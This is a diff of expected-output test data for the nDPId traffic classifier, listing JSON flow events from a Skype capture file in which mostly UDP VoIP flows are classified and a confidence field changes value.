-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
